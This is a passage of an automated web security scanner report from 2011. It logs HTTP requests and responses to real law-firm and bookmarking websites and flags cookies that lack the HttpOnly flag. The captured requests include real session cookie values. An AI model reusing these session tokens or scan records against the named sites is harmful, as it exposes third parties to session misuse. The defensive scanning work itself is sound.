GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:26:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 92372
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.cov.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-US/regions/middle_east/ HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The following cookie was issued by the application and does not have the HttpOnly flag set:
DefaultCulture=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /health_care/health_care_reform/ HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /industry/financial_services/dodd_frank/ HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ja-JP/practice/region.aspx HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fError.html%3faspxerrorpath%3d%2fFCWSite%2fFeatures%2fServices%2fregion.aspx">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ko-KR/practice/region.aspx HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fError.html%3faspxerrorpath%3d%2fFCWSite%2fFeatures%2fServices%2fregion.aspx">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/detail.aspx HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /zh-CN/practice/region.aspx HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fError.html%3faspxerrorpath%3d%2fFCWSite%2fFeatures%2fServices%2fregion.aspx">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Austin HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1830%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:25 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Beijing HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A47%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1944%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:53:47 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Dallas HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A49%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1950%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:53:49 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Denver HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1974%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /FAA_adv HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D888%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:50:17 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /HongKong HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2092%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:54:25 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /London HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2108%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:28 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /LosAngeles HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A45%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2193%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:45 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Minneapolis HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2239%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Munich HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:55:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A55%3A14%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2338%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:55:14 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Riyadh HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:56:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A56%3A29%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2679%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:56:29 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /SanAntonio HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:56:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A56%3A53%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2763%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:56:53 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /StLouis HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:57:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A57%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2807%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:57:04 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
